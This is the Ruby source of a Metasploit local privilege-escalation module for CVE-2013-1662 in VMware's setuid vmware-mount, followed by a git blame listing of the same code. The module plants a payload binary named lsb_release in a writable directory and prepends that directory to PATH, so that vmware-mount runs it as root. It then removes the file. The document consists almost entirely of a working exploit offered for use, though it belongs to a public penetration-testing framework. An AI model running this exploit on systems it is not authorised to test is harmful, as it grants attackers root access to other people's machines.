metasploit-framework/modules/exploits/linux/local/vmware_mount.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class MetasploitModule < Msf::Exploit::Local

  include Msf::Exploit::EXE
  include Msf::Post::File

  def initialize(info={})
    super( update_info( info, {
        'Name'          => 'VMWare Setuid vmware-mount Unsafe popen(3)',
        'Description'   => %q{
          VMWare Workstation (up to and including 9.0.2 build-1031769)
          and Player have a setuid executable called vmware-mount that
          invokes lsb_release in the PATH with popen(3). Since PATH is
          user-controlled, and the default system shell on
          Debian-derived distributions does not drop privs, we can put
          an arbitrary payload in an executable called lsb_release and
          have vmware-mount happily execute it as root for us.
        },
        'License'       => MSF_LICENSE,
        'Author'        =>
          [
            'Tavis Ormandy', # Vulnerability discovery and PoC
            'egypt' # Metasploit module
          ],
        'Platform'      => [ 'linux' ],
        'Arch'          => ARCH_X86,
        'Targets'       =>
          [
            [ 'Automatic', { } ],
          ],
        'DefaultOptions' => {
          "PrependSetresuid" => true,
          "PrependSetresgid" => true,
          "PrependFork" => true,
        },
        'Privileged'     => true,
        'DefaultTarget' => 0,
        'References' => [
          [ 'CVE', '2013-1662' ],
          [ 'BID', '61966'],
          [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
          [ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ],
          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/05/cve-2013-1662-vmware-mount-exploit' ]
        ],
        'DisclosureDate' => "Aug 22 2013"
      }
      ))
    register_options([
        OptString.new("WRITABLEDIR", [ true, "A directory where you can write files.", "/tmp" ]),
      ], self.class)
  end

  def check
    if setuid?("/usr/bin/vmware-mount")
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  def exploit
    unless check == CheckCode::Appears
      fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
    end

    lsb_path = File.join(datastore['WRITABLEDIR'], 'lsb_release')
    write_file(lsb_path, generate_payload_exe)
    cmd_exec("chmod +x #{lsb_path}")
    cmd_exec("PATH=#{datastore['WRITABLEDIR']}:$PATH /usr/bin/vmware-mount")
    # Delete it here instead of using FileDropper because the original
    # session can clean it up
    cmd_exec("rm -f #{lsb_path}")

  end

  def setuid?(remote_file)
    !!(cmd_exec("test -u #{remote_file.strip} && echo true").index "true")
  end

end
Add local exploit for taviso's vmware privesc 2013-08-27 02:06:40 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add local exploit for taviso's vmware privesc 2013-08-27 02:06:40 +00:00			`##`

			`require 'msf/core'`
			`require 'rex'`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Local`
Add local exploit for taviso's vmware privesc 2013-08-27 02:06:40 +00:00
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00			`include Msf::Exploit::EXE`
			`include Msf::Post::File`
Add local exploit for taviso's vmware privesc 2013-08-27 02:06:40 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info={})`
			`super( update_info( info, {`
			`'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',`
			`'Description' => %q{`
			`VMWare Workstation (up to and including 9.0.2 build-1031769)`
			`and Player have a setuid executable called vmware-mount that`
			`invokes lsb_release in the PATH with popen(3). Since PATH is`
			`user-controlled, and the default system shell on`
			`Debian-derived distributions does not drop privs, we can put`
			`an arbitrary payload in an executable called lsb_release and`
			`have vmware-mount happily execute it as root for us.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Tavis Ormandy', # Vulnerability discovery and PoC`
			`'egypt' # Metasploit module`
			`],`
			`'Platform' => [ 'linux' ],`
			`'Arch' => ARCH_X86,`
			`'Targets' =>`
			`[`
			`[ 'Automatic', { } ],`
			`],`
			`'DefaultOptions' => {`
			`"PrependSetresuid" => true,`
			`"PrependSetresgid" => true,`
Retab changes for PR #2325 2013-09-05 18:24:09 +00:00			`"PrependFork" => true,`
Retab modules 2013-08-30 21:28:54 +00:00			`},`
			`'Privileged' => true,`
			`'DefaultTarget' => 0,`
			`'References' => [`
			`[ 'CVE', '2013-1662' ],`
			`[ 'BID', '61966'],`
			`[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],`
Add Metasploit blog references These modules have blogs from the Rapid7 community, we should add them. 2013-10-02 01:50:16 +00:00			`[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ],`
			`[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/05/cve-2013-1662-vmware-mount-exploit' ]`
Retab modules 2013-08-30 21:28:54 +00:00			`],`
			`'DisclosureDate' => "Aug 22 2013"`
			`}`
			`))`
Add configurable directory, rather than relying on the session working directory. 2014-11-27 17:12:37 +00:00			`register_options([`
Suggestions from OJ 2014-11-27 21:38:50 +00:00			`OptString.new("WRITABLEDIR", [ true, "A directory where you can write files.", "/tmp" ]),`
Add configurable directory, rather than relying on the session working directory. 2014-11-27 17:12:37 +00:00			`], self.class)`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Add local exploit for taviso's vmware privesc 2013-08-27 02:06:40 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def check`
			`if setuid?("/usr/bin/vmware-mount")`
Update some checks 2014-01-24 18:08:23 +00:00			`CheckCode::Appears`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
			`CheckCode::Safe`
			`end`
			`end`
Add local exploit for taviso's vmware privesc 2013-08-27 02:06:40 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
Change to in exploit 2014-11-26 06:53:30 +00:00			`unless check == CheckCode::Appears`
Retab modules 2013-08-30 21:28:54 +00:00			`fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")`
			`end`
Add local exploit for taviso's vmware privesc 2013-08-27 02:06:40 +00:00
Suggestions from OJ 2014-11-27 21:38:50 +00:00			`lsb_path = File.join(datastore['WRITABLEDIR'], 'lsb_release')`
			`write_file(lsb_path, generate_payload_exe)`
			`cmd_exec("chmod +x #{lsb_path}")`
			`cmd_exec("PATH=#{datastore['WRITABLEDIR']}:$PATH /usr/bin/vmware-mount")`
Retab modules 2013-08-30 21:28:54 +00:00			`# Delete it here instead of using FileDropper because the original`
			`# session can clean it up`
Suggestions from OJ 2014-11-27 21:38:50 +00:00			`cmd_exec("rm -f #{lsb_path}")`

Retab modules 2013-08-30 21:28:54 +00:00			`end`
Add local exploit for taviso's vmware privesc 2013-08-27 02:06:40 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def setuid?(remote_file)`
Actually use the argument 2014-03-04 17:30:42 +00:00			`!!(cmd_exec("test -u #{remote_file.strip} && echo true").index "true")`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Add local exploit for taviso's vmware privesc 2013-08-27 02:06:40 +00:00
			`end`